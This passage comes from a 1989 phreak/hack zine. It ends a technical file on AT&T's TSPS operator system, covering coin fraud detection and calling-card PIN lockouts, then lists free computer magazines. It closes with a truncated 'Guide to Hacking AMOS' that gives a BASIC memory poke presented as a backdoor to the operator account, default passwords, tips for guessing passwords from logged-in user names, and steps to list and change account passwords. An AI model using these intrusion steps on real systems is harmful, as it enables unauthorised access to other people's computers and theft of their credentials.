that postpay coin stations lack coin return equipment, and cannot return deposited coins (i.e.- Postpay stations do not have a coin hopper, only a coin box). This physical restriction requires the operator to verify that the correct party has been reached (and goes off-hook), before the customer makes any deposit. Upon verification, a type II CDA circuit is connected to count and monitor the coin deposits. This type of circuit is also connected whenever there is a large amount of change associated with the call. This is because the coin hoppers on standard payphones, can only handle limited deposits. If a deposit exceeds the hopper limit, an operator will be bridged to the circuit to make a series of partial collections. 6.3 SSAS Fully Automatic Criteria ================================== The SSAS fully automates 1+ coin station calls (ACTS) if and only if all of the following conditions are met. Failure to meet any of these conditions results in operator intervention. 6.3.1) ACTS Converted Trunk Group ================================== - Coin Stations must be converted to provide DTMF coin deposit signals that the CDA can recognize. 6.3.2) Machine Ratable ======================= - The TSPS must receive sufficient rating information; failure to do so will result in operator intervention. 6.3.3) Successful ANI ====================== - If ANIF or the call is ONI, an operator must be added to the circuit to record the calling number. 6.3.4 Cannot Be a Postpay Station ================================== - See previous explanation of postpay stations (6.2). 6.3.5 Cannot Have Large Charges ================================ - See previous explanation (6.2). 6.4 Fraud Detection and Prevention ================================== If a calling customer goes on-hook (hangs up), at the end of a conversation and charges are still due, TSPS automatically sends a ringback signal to that station in the attempt to get the customer to pick up the phone. If the calling party answers, an ACTS overtime charge message is made requesting the customer to deposit the remaining amount due. At any time during this message, an operator may be connected to the circuit and harass the customer for payment If however 5 rings with a 4 second interval occur without an off-hook state change, TSPS assumes a walkaway, and a registered traffic counter is flagged, a walkaway bit set, and the amount due is all registered as AMA data. Whenever the called party is off-hook, ACTS is susceptible to generated coin signals (Red Box Tones). In an attempt to prevent this fraud, a special type II CDA is employed: Two-wire trunks are isolated between forward and back party to monitor coin deposits. The talking path maintains conversation by being routed through the type II CDA. When coin signals are detected, the SSAS informs TSPS that a called party fraud is suspected. If more then one detection occurs on one call, TSPS flags a fraud indicator on the calls AMA record. NOTE:A trunk group may or may not detect and/or record this information depending on office criteria. 7.0 Calling Card Service and Billed Number Service =================================================== I am assuming that everyone reading this file has at least some concept of what a calling card is and how it would be utilized from a local office. The CCS and BNS services are implemented in TSPS by CCIS hardware, SSAS and several processing programs that will not be discussed in this file (ABEGN, ACALL, ASEQ...) The CCS and BNS together provide for the customer an automated credit card calling option that was initially implemented as an alternative to third party billing, collect and large change calls. In order for the CCS and BNS to function, they require that each TSPS becomes a node on the SPC network, which then allows access to a nationwide database of Billing Validation Applications (BVA). The BVA currently consists of nodes which are connected by CCIS, and are in turn made up of individual Billing Validation Files (BVF). A BVF is a file of data that is needed by the SPC and associated database software to process queries about the data. Each TSPS is integrated into the SPC network and uses the CCIS direct signaling to access the BVA. Connected in parallel to the BVA is the Network Call Denial (NCD), which allows the call denial to AT&T customers with outstanding bills. The CCS billing number consists of a 10 digit billing number and a 4 digit PIN. There are two categories that a CCS billing number can fall into and they are as follows: - 7.0.1) Directory Billing Number ================================= - The billing number is usually the directory number to which the card is billed, and is in the following format: NPA-NXX-XXXX : Where the NPA represents Numbering Plan Area, N is a digit 2-9, and X is a digit 0-9. - 7.0.2) Special Billing Number =============================== - Wheras the typical CCS billing number is discribed above in 7.0.1, here exists a special type of billing number that bills the card to a special nondirectory billing number. The format for this type of card is as follows: RAO-(0/1)-XX-XXXX : Where the RAO is the Revenue Accounting Office code which assigns the billing number. The X represents a digit 0-9. The PIN is a 4 digit number in the format of NYYY, where N is a digit 2-9, and Y a digit 0-9. Each PIN is designated upon assignment to the customer as either restricted or unrestricted. An unrestricted PIN can place calls to all destinations. If the called number is the same as the billing number, only the 4 digit PIN need be entered by the customer. A restricted PIN can only be used for station calls to the billing number. NOTE: A special billing number (section 7.0.2) can only have an unrestricted PIN. The CCS can be broken down into two basic category of calling types and are as follows: 7.1 Customer Dialed CCS Call ============================= The customer initiates the CCS sequence by dialing a 0 + Called Number. The Called number can take the format of a 7 digit number, a 14 digit number or 01+ country code and national number. This information, as well the calling number (originating) is received by TSPS from the CO. OST is then used to determine whether CCS is available/given to the customer. Based on the determined OST features (Does phone have Touch Tone? Is it a coin station?..), TSPS either routes the call to an operator or provides an alerting tone and announcement to prompt the customer for the CCS number (in the format discussed in sec 7.0). Assuming no operator intervention, the CCS number is subjected to a series of checks and queries detailed below. (sec 7.3) 7.2 Operator Dialed CCS Call ============================ There are several ways a customer can receive operator assistance in CCS dialing. - 7.2.1) 0- call. - 7.2.2) 0+ Called Number +0 - 7.2.3) 0+ Called Number +Switch-hook flash. - 7.2.4) 0+ Called Number +No Action. - 7.2.5) 0+ Called Number +OST feature information requiring operator intervention. Example: Call placed from rotary phone... - 7.2.6) 0+ octothorpe. A customer dials an octothorpe ( pound key "#") after the initial 0. When the position is seized if the operator determines that a CCS call is requested, the operator keys in the CCS number (or the PIN only) and call is subjected to a series for checks for validity, detailed below (sec 7.3) 7.2.1 Non-TSPS Dailed CCS Call =============================== The TSPS operators do not serve all CCS users. Non-TSPS operators and independent telephone companies also serve CCS customers, and must access the BVA for validity checks.(Examples: mobile,marine,international...) This access to the BVA is provided for cordboards and independent telephone companies by reaching a nearby TSPS, via TSPS base unit inward trunks. A distant operator may reach the BVA by any of the routing codes detailed in section 4.2.6, and the CCS validation is subject to the same security checks detailed below. If a non-TSPS operator dials either KP+(1161 or 1162)+ST, the operator hears a CCS alert tone, and then has one minute in which to dial the 14 digit CCS number. The TSPS initiates a format check, an APF check (see 7.3), and access the BVA to determine the status of the CCS number in question. The following are the different corresponding announcements which would follow: - Calling Card Service Number Accepted, PIN unrestricted - Calling Card Service Number Accepted, PIN restricted - Calling Card Service Number Accepted, RAO unknown - Calling Card Service Number Rejected If a CCS number is accepted, the connection to the non-TSPS operator is terminated by the TSPS. If a rejection message results, the operator will be prompted by the alert tone and may attempt to redial the CCS. 7.3 CCS Validation =================== After the CCS billing number is keyed in (either by customer, TSPS operator, or independent operator) the All PINs Fail (APF) feature may cause the card to be rejected and the call to be halted. The APF is a security feature designed to frustrate attempts at discovering valid PINs by a brute force hack method (trial and error). A list of CCS validation failures is maintained, which is updated with both invalid billing numbers and calling numbers. When a number of failures for a given billing number exceeds a specified threshold, in x amount of time, all subsequent attempts are declared invalid for a certain amount of time y (Lock Out Time). Even if the actual PIN is used during the lockout time, the CCS number would be considered invalid, and the call process would be halted. 7.4 Billed Number Screening ============================ The BNS service applies to collect and third party billing calls placed through a TSPS operator. The BVF contains information designating certain numbers as "collect denied" or "bill-to-third denied". Each time an operator attempts to place a collect or third party billing number a BVA and a NCD inquiry are made. 8.0 Busy Line Verification =========================== A dedicated network is provided to process BLV calls and traffic. This network originates at the TSPS base office and connects through dedicated trunks to toll, intertoll, and local offices. The equipment consists of the BLV trunk, a TSPS-4 wire bridging repeater, a verification circuit at TSPS, InComing Verification Trunks (ICVT), OutGoing Verification Trunks (OGVT) at both toll and intertoll offices, and Incoming No Test Trunks (INTT) at local offices. The TSPS gains access to a single local, toll, and/or intertoll office. The initial request for a BLV appears as an position seizure to a TSPS operator over an incoming trunk via a local office or as an inward trunk via a toll office. The initial loop seized becomes the originating loop and is connect in position via an idle TSPS loop. In that the originating loop cannot be connected to the verification loop, the operator must switch between the two. Security is maintained to insure that a customers privacy is not violated, and consists of the following: - 8.0.1) Speech Scrambler at Console Level (not BLV trunk level). - 8.0.2) Alert Tone Generator (ATG). - 8.0.3) Translation of the NPA to 0XX or 1XX. - 8.0.4) Dedicated BLV trunks. - 8.0.5) Cross office security checks at toll offices. 8.1 BLV Processing =================== When a customer requests that a BLV be preformed on a certain number within the TSPS's LAN the following actions are taken. - 8.1.1) The TSPS attempts to DDD the number in question , to confirm that the number is indeed busy. This action is preformed so that if in the event that an recorded error announcement is reached, the operator may understand the nature of the error without the speech scrambler interfering in quality. - 8.1.2) If the line is confirmed to be busy and the customer requests further action, the operator then attempts verification through the BLV network. The operator then presses the VFY key, in which case an attempt at a BLV will be made if and only if the following conditions are met: - 8.1.2.1) There is an idle loop at the position =============================================== - This condition must be met because the BLV trunk must be placed in a loop with the Traffic Service Position. If there are no idle loops remaining the BLV cannot be processed. This condition can be gotten around by the operator pressing the POS TRSFR key, which causes all the calls in the hold state to be transferred to loops on the original operator position. - 8.1.2.2) The call is on an incoming/inward trunk ================================================ - This insures that an operator cannot preform a BLV without a originating customer request. - 8.1.2.3) The called party is off-hook ====================================== - See 8.1.2.2 - 8.1.2.4) The called number is a domestic number ================================================ - That is the called number cannot be an overseas number. - 8.1.2.5) The call has no forward connection ============================================ - This ensures that the busy condition detected by the INTT is not due to the connection of the calling party. - 8.1.2.6) The line number can be verified ========================================= - This condition would fail if the local office is not served by the BLV network... - ..or the number in question is excluded from BLV calls (Example: Emergency or Police Lines...) 8.1.3) The BLV is preformed and the BLV trunk dropped by pressing the REC MSG key for an incoming call or VFY for an inward call. 9.0 Conclusion : Acknowledgements and References ================================================= I have assumed that the reader of this file has a general working knowledge of phone systems and their associated terminology. As it is impossible to please everyone, some readers will find this file too advanced while others will find it lacking in several areas...too bad. This file has intentionally *not* covered previously released information on TSPS found in files by other authors, in an attempt to provide the phreak/hack community with another source of information to be used in conjunction with the existing ones. The following reading list is highly recommend for furthering ones knowledge on TSPS, and is as follows: - Understanding TSPS Part 1: The Console - Written by The Marauder, LOD/H Technical Journal: Issue No. 1, file #4. - Busy Line Verification Part 1 - Written by Phantom Phreaker, Phrack Vol 2, Issue XI, file #10. - Busy Line Verification Part 2 - Written by Phantom Phreaker, Phrack Vol 2, Issue XII, file #8 - Telephony Magazine 9.1 Acknowledgements ===================== - Eastwind...the Man Behind the Garbage Can... - AT&T - My Local RBOC...and all of the Trash that's fit to print =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P/HUN Issue #4, Volume 2: Phile 7 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 5/19/89 * Free Computer Magazines * 5/19/89 by + Southern Cross + _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ TPT Networking Management 1421 S. Sheridan P.O. Box 21728 Tulsa, OK 74101-9977 Computer Design Recommended P.O. Box 2389 Tulsa, OK 74101-9933 Scientific Computing & Automation Recommended 301 Gibraltar Drive P.O. Box 608 Morris Plains, NJ 07950-0608 Industrial Product Bulletin 301 Gibraltar Drive P.O.Box 650 Morris Plains, NJ 07950-0650 Computer Products 301 Gibraltar Drive P.O. Box 601 Morris Plains, NJ 07950-9813 Connect Journal of Computer Networking 3165 Kifer Rd. P.O.Box 58145 Santa Clara, CA 95052 Microcomputer Solutions Magazine Intel Corporation GRI-58 P.O. Box 58065 Santa Clara, CA 95052-8065 Evaluation Engineering 2504 North Tamiami Trail Nokomis, FL 34275-9987 Electronics Recommended P.O. Box No. 2713 Clinton, Iowa 52735 Systems Integration P.O. Box 5051 Denver, CO 80217 EDN Recommended P.O. Box 5262 Denver, CO 80217-9865 Computer Technology Review Recommended West World Productions, Inc. 924 Westwood Blvd., Suite 650 Los Angeles, CA 90024-2910 Microwave Journal Recommended 685 Canton Street Norwood, MA 02062 NASA Tech Briefs Recommended Associated Business Publications 41 E. 42nd St., Suite 921 New York, NY 10164-0672 Computer & Software News A Lebhar-Friedman Publication Grand Central Station P.O. Box 3119 New York, NY 10164-0659 Compliance Engineering Recommended 629 Massachusetts Avenue Boxborough, MA 01719-9974 Government Computer News P.O. Box 3705 McLean, VA 22103 Federal Computer Week 3110 Fairview Park Drive Falls Church, VA 22042-4599 Defense Electronics Recommended EW Communications, Inc. P.O. Box 50249 Palo Alto, CA 94303-9983 Defense Computing Recommended P.O. Box 5286 Pittsfield, MA 01203-5286 Laurin Publishing Co., Inc. Photonics Spectra P.O. Box 2037 Pittsfield, MA 01202-9925 Computer Graphics Review P.O. Box 12950 Overland Park, KS 66212-0950 Electronic Design Recommended VNU Business Publications P.O. Box 5194 Pittsfield, MA 01203-5194 Electronic Products Recommended P.O. Box 5317 Pittsfield, MA 01203-9899 Software Magazine Not Recommended P.O. Box 542 Winchester, MA 01890 Specialized Products Company Recommended 2117 W. Walnut Hill Lane Irving, TX 75038-9955 The LAN Catalog & Black Box Catalog Black Box Corporation P.O. Box 12800 Pittsburgh, PA 15241-9912 Computer-Aided Engineering A Penton Publication 1100 Superior Avenue Cleveland, OH 44197-8006 PERX (catalog) 1730 S. Amphlett Blvd., Dept. 222 San Mateo, CA 94402 Anasco (catalog) Commerce Center Building 42A Cherry Hill Drive Danvers, MA 01923-9916 MetraByte Corporation (catalog) Recommended 440 Myles Standish Blvd. Taunton, MA 02780 Micro Networks (A/D catalog) Recommended 324 Clark Street Worcester, MA 01606 Programmer's Connection 7249 Whipple Ave. NW North Canton, OH 44720 Burr-Brown Corporation (catalog) P.O. Box 11400 Tuscon, AZ 85734 WAVETEK San Diego (catalog) Recommended P.O. Box 85434 San Diego, CA 92138 Digi-Key Corporation (catalog) Recommended 701 Brooks Avenue South P.O. Box 677 Thief River Falls, MN 56701-0677 Consumertronics Co. (catalog) Recommended 2011 Crescent Drive, P.O. Drawer 537 Alamogordo, NM 88310 Time Motion Tools (catalog) 410 South Douglas Street El Segundo, CA 90245 EXAR Corporation (modem design catalog) 750 Palomar Ave. P.O. Box 3575 Sunnyvale, CA 94088 ATTN: Marketing Communications Chilton's Instrumentation & Control News Box 2006 Radnor, PA 19089-9975 Communications Week P.O. Box 2070 Manhasset, NY 11030 Computer Systems News CMP Publications, Inc. 600 Community Drive Manhasset, NY 11030 Electronic Engineering Times Circulation Dep't. Box 2010 Manhasset, NY 11030 Network World P.O. Box 1021 Southeastern, PA 19398-9979 Digital Review P.O. Box 40065 Philadelphia, PA 19106-9931 Digital News P.O. Box 593 Winchester, MA 01890-9953 DEC Professional P.O. Box 503 Spring House, PA 19477-0503 Macintosh News Circulations Dep't. P.O. Box 2180 Manhasset, NY 11030 UNIX Today! CMP Publications, Inc. 600 Community Drive Manhasset, NY 11030 LAN Times 122 East 1700 South P.O. Box 5900 Provo, UT 84601 Electronic Business 275 Washington Street Newton, MA 02158-1630 PCNetwork P.O. Box 457 Newton, NJ 07860 INFO World P.O. Box 5994 Pasadena, CA 91107 Reseller Management Not Recommended 301 Gibraltar Drive P.O. Box 601 Morris Plains, NJ 07950-9811 Computer Reseller News Not Recommended CMP Publications, Inc. 600 Community Drive Manhasset, NY 11030 This is a partial list of free computer magazines and newspapers of interest to the hacker/phreaker community. Just ask for a free subscription form, fill it out, and you'll have enough to read for a long time! (You also get to stay on top of the "state" of the art) The recommended mags have articles, products, schematics, and diagrams of particular interest and application for most of the community. (You'll find that they're an education unto themselve +SC+ Cruise Director S.S. Phuntastic (...lost in a sea of paper...) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + P/HUN Issue #4, Volume 2: Phile 8 of 11 + + DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD + + A Guide to Hacking AMOS + + ----------------------- + + By NightCrawler + +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ The Alpha Micro computer is a fairly easy system to understand, for those of you familiar with VAX systems. The operating system (AMOS) is a ripoff of the DEC stuff, so many commands are similar. This is a guide on how to use the Alpha. Background on security: ---------- -- --------- When the Alpha Micro leaves the factory, they do not have any type of security feature built into it, except for certain higher end models, which will be discussed later. Thus, if the user installs a modem directly to the system, and you call in, you'll be at the OS level already. Pretty easy, eh? Due to the lack of a cursor display character, the pound sign (#) will be used to represent the cursor throughout this document. The prompt for AMOS is a period, which users refer to as the dot. Wnen you log on, you'll see this: .# At this point, you can type away and use the various accounts and programs on the system. When you first connect, depending on how the last user left the modem, you may or may not be logged in to a partition. To verify this, type in the LOG command. .LOG The computer will respond in one of two fashions. If it says "Not logged in", then you will have to log to an existing account. If it says "Current login is DSK1:[203,1]", then there is no need to scan for an account right away. Perhaps the most important thing to do after this is to do a SYSTAT, which will let you know who else is on the system, and what account, program is being run, and other info. Example: .SYSTAT Status of AMOS/L version 1.3D(165) on Friday, November 11, 1988 03:24:54 PM JOB1 TRM1 DSK1:201,3 0067732 ^C CONECT 122880 bytes at 4505554 JOB2 TRM2 DSK0:1,2 0024984 TI SYSACT 176800 bytes at 4505554 JOB3 TRM3 Not logged 0015460 ^C MEMORY 12288 bytes at 3137554 MODEM HAYES DSK0:1,4 0037325 SL SYSTAT 67912 bytes at 2179023 4 jobs allocated on system, 3 jobs in use (3 logged in) Total memory on system is 2048K bytes System uptime is 07:28:19 DSK0 26402 blocks free DSK1 3578 blocks free 4 devices on system, total of 29980 blocks free .# Here's a quick rundown on what each column means... Col 1: The name of the job Col 2: The terminal to which the job is attached Col 3: The device and account into which the job is logged Col 4: The octal memory address where the JCB is located Col 5: Terminal status of for that job Col 6: Last program run by that job Col 7: Number of bytes (decimal) of memory allocated Col 8: Octal memory address for beginning memory partition The rest is self explanatory. The 5th column (terminal status) has numerous codes which need to be given. Here's the abbreviation and what it stands for: TI Terminal input wait state TO Terminal output wait state LD Program load state SL Sleep state IO I/O access other than terminal EW External wait state RN Running SP Suspended state SW Semaphore wait ^C Control-C The SYSTAT program can be used even when you are not logged in, which is a plus if you wish to access an account without knowing the password. There is another program, called STAT, but don't use this. It constantly updates the screen, and will mess you up if you're using a modem. Before going further, it should be mentioned on how the Alpha Micro computer is structured. On each system, a number of hard drives subdivided into logical units are encountered. These may be named in any fashion by the sysop, following only the limitation of the LU being three letters or less in length. This is then followed by the device number. Sample LU's may look like: DSK0:, DSK1:, WIN0:, HWK3:, etc. On each disk is found a grouping of accounts, also known as partitions, or PPN's (project, programmer number). It is in these accounts where you log in to, and execute programs. These are enclosed in square brackets [], to separate them from the disk specification. When used all togther, it looks like this: DSK0:[1,2], DSK0:[1,4], WIN3:[100,0], DSK4:[377,7] System Commands: ------ --------- When in doubt, type HELP. This will give you some online information the system you are currently logged in to. Below are a list of some of the more common commands that you can use. ASCDMP -- displays the data in physical bocks in ASCII form. ATTACH -- connects a job to a terminal. BASIC -- places you in interactive BASIC mode. BATCH -- loads frequently used commands to your memory partition. BAUD -- change the baud rate of your terminal. CAL100 -- allows you to calibrate the clock oscillator. CLEAR -- write zeroes to all free disk blocks. COMPIL -- use this to compile BASIC programs. COPY -- copies one or more files between accounts or disks. CREATE -- creates a random file of specified size (any size!!). CRT610 -- verifies quality of videocasstte backup media. DATE -- returns with current system date. DING -- rings the terminal bell. DIR -- gives a directory listing for specific files or accounts. DIRSEQ -- alphabetizes all current entries in an account. DSKANA -- analyzes the data on a disk, and reports errors. DSKCPY -- copies contents of one disk and places on another disk. DSKDDT -- allows you to examine and change data directly on disk. DSKPAK -- packs the blocks in use to create area of free blocks. DUMP -- display file contents & memory to the screen. ERASE -- deletes one or more files from disk. ERSATZ -- displays the currently defined ersatz names. FIX -- disassemble assembler (.LIT) code. FORCE -- allows you to send terminal input to another job. HELP -- displays all available help files for the system. JOBALC -- displays your job name. JOBPRI -- determine your job priority, and change other's priority. JOBS -- shows all jobs on system, and how many are in use. KILL -- kill the program being run by another job, or a single job. LNKLIT -- creates ML programs by linking object code files. LOAD -- loads disk files into your memory partition as mem modules. LOG -- logs you into an account so you can access the files there. LOGOFF -- logs you out of the account you were logged into. MAKE -- creates the first record of a SEQ file (make a bogus file). MEMORY -- allocates memory to your job (e.g. .MEMORY 64K). MONTST -- tests the system monitor by bringing up the system new. MOUNT -- see which disks are on the system. Do a /U to unmount a disk. M68 -- assemble an assembler program to an unlinnked ML file. PASS -- allows you to change your account password. PPN -- displays a list of all accounts on a logical device (eg DSK0:). PRINT -- send one or more files to a printer. QDT -- allows you to examine and modify locations in memory. REBOOT -- reboots the system after hitting RETURN. REDALL -- diagnostic test that looks at disk & reports read errors. RENAME -- rename files in an account from one name to another. RUN -- runs a compiled BASIC program. SAVE -- save memory modules as disk files. SEND -- send messages to other terminals on the system. SET -- set terminal handling options for your terminal. SLEEP -- put your job to "sleep" for a period of time. SORT -- alphabetically & numerically sort data in a SEQ file. STAT -- displays & continually updates status of all system jobs. SUBMIT -- used to enter, change, or delete files from task manager. SYSACT -- used to change account passwords, or initialize a disk. SYSTAT -- mentioned above. TIME -- displays or sets the time of day. TRMDEF -- gives information about the system terminals. TYPE -- displays a text file to the screen (use the /P switch). VCRRES -- read files from videocassette to disk. VCRSAV -- save files from disk to videocassette. VER -- gives you version of current operating system level. VUE -- create and enter text editor. Use ESCape to toggle modes. You have to be careful with how the programs are used. If done inappropriately, you could do major damage to the computer. Many of the above programs can only be executed from the operator account DSK0:[1,2]. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Entering via BASIC: There is a back door in the version of BASIC that comes bundled with AMOS. Depending on the type of security present, you can gain access to the system operator account (DSK0:[1,2]), which gives you the power to do quite a few things. What the command essentially does is poke into memory the appropriate values to give you sysop access. Type this in at the dot prompt (.) : .BASIC AlphaBASIC Version 1.3 (217) READY # Once inside BASIC, type in this command as seen below; it doesn't matter if you use upper or lower case. WORD(WORD(1072)+20)=258 BYE .# The BYE command exits you out of BASIC and puts you back at the OS level. You can also rename files and open files via BASIC. Depending on the security in the system, if you typed in everything as above, you should be logged into DSK0:[1,2], also known as OPR:. This is the system operator's account, from which all types of commands can be issued. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ When you finally get connected to the system, you need some place to log in to. There are certain default accounts on every system. These are: OPR: --> DSK0:[1,2] SYS: --> DSK0:[1,4] DVR: --> DSK0:[1,6] CMD: --> DSK0:[2,2] LIB: --> DSK0:[7,0] HLP: --> DSK0:[7,1] BOX: --> DSK0:[7,2] BAS: --> DSK0:[7,6] MAC: --> DSK0:[7,7] While logging around to the different accounts, some will have defined "ersatz" names. This means that besides the [p,pn] specification, you can access that account with a defined name. In the above examples, logging into SYS: is the same as logging into DSK0:[1,4]. As mentioned previously, older models of the Alpha Micro did not have any security built in to them. Later versions of the operating have changed this, though. Once you get connected and you try to log into an account, you may be asked for a password. The word you type is not echoed on your screen. Two default passwords that you can try for logging purposes are "DEMO" and "SYSTEM SERVICE". These are not case-sensitive, so you can type them in either upper or lower case. If neither of these work (which is unlikely, since people are too lazy to change them), try running the SYSTAT command. What happens is that you will often see people logged in under a short (6 digits or less) user name, such as JOHN, AMY, SUSAN, etc. Try logging in with one of these as your PW. 80 per cent of the time it will work. If you've gotten into the system this far, then good. There are lots of things to do or access. If you're looking around for information, these are contained in files that end in a .TXT extension. These may be examined by using the TYPE command from AMOS. The syntax would be: .TYPE MODEM.TXT/P The /P is not required, but is useful, because otherwise the file would be diaplayed too quickly for you to look at. The /P switch displays the contents one page at a time. Pressing will scroll through the text. One word of warning: Don't use the TYPE command on .LIT, .SBR, or .OBJ files; doing so will usually result in your terminal being locked up, effectively ending your session. Now let's say you wanted to check out the files that are in other accounts. Usually all that is needed is to simply log there. However, certain accounts will be passworded. There is no simple way to just dump the contents of a disk block and see what the PW is. There are alternatives, however. One method is to log into the operator account (DSK0:[1,2]) and use the SYSACT command. This lets you to various things to the disk, but the one you would be concerned about lists all of the accounts on a parti- cular disk. The command works like this: .# .SYSACT DSK0: Use the "H" to get a listing of all the available commands from within SYSACT. * *h Implemented commands are: A PPN - Add a new account C PPN - Change password of an account D PPN - Delete an account E - Rewrite MFD and exit to monitor H - Help (Print instructions) I - Initialize entire disk L - List current accounts The last one "L" is the one we're concerned with. Press after it to see a listing of all the accounts on the disk. Passwords (if any) will be displayed to the right. The "C" option will allow you to change the PW on an individual account. Then press "E" to go back to the command level. If you want to check out a file a little less elegantly, this may be done by simply copying the file to an unpassworded account or by typing the file from another account. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Account and file structure: As explained before, there are accounts on the disk, which may or may not contain files in them. AMOS maintains this account structure on the disk. In fact, a listing of which files belong in what account are kept track of in the account directory. There are two types of files that are possible on the Alpha Micro: sequenti